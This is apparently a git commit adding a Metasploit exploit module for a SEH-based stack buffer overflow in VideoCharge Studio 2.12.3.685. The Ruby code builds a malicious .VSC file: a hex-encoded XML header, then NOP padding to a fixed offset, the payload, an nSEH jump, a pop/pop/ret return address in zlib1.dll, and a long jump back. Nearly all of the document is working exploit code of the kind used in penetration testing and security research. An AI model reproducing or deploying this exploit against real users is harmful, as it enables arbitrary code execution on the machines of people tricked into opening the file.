Added VideoCharge Studio File Format Exploit

bug/bundler_fix
jakxx 2015-08-07 15:54:32 -04:00
parent 67f661823a
commit 28ad0fccbd
1 changed files with 92 additions and 0 deletions

View File

@ -0,0 +1,92 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'VideoCharge Studio 2.12.3.685 Buffer Overflow (SEH)',
'Description' => %q{
This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when
processing a specially crafted .VSC file. This vulnerability could be
exploited by a remote attacker to execute arbitrary code on the target
machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Original discovery
'Andrew Smith', # MSF Module
],
'References' =>
[
[ 'OSVDB', '69616' ],
[ 'CVE', '' ],
[ 'EBD', '29234' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
'DisableNops' => true,
},
'Targets' =>
[
[ 'VideoCharge Studio 2.12.3.685',
{
'Ret' => 0x61B811F1, #p/p/r | zlib1.dll
'Offset' => 824
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Oct 27 2013',
'DefaultTarget' => 0))
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),], self.class)
end
def exploit
buffer = "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22"
buffer << "\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32"
buffer << "\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D\x22\x32\x2E"
buffer << "\x31\x32\x2E\x33\x2E\x36\x38\x35\x22\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D"
buffer << "\x65\x3D\x22\x46\x69\x6C\x65\x73\x22\x2F\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61"
buffer << "\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x73\x22\x3E\x0A\x0A\x3C\x50\x72\x6F\x70"
buffer << "\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x22\x3E\x0A"
buffer << "\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x46\x6F\x72\x6D\x61\x74\x73\x22"
buffer << "\x3E\x0A\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74"
buffer << "\x72\x65\x61\x6D\x22\x3E\x0A\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22"
buffer << "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22"
buffer << make_nops(target['Offset']-payload.encoded.length)
buffer << payload.encoded
buffer << "\xeb\x06\x90\x90" #nseh negative jump
buffer << [target.ret].pack("V")
buffer << "\xe9\x3f\xfd\xff\xff" #long jump
buffer << "\x22\x2F\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F"
buffer << "\x63\x6F\x6C\x73\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x52\x6F"
buffer << "\x6D\x61\x6E\x69\x61\x20\x53\x65\x63\x75\x72\x69\x74\x79\x20\x54\x65\x61\x6D\x22\x2F"
buffer << "\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6C"
buffer << "\x73\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6E\x66\x69\x67\x3E"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(buffer)
end
end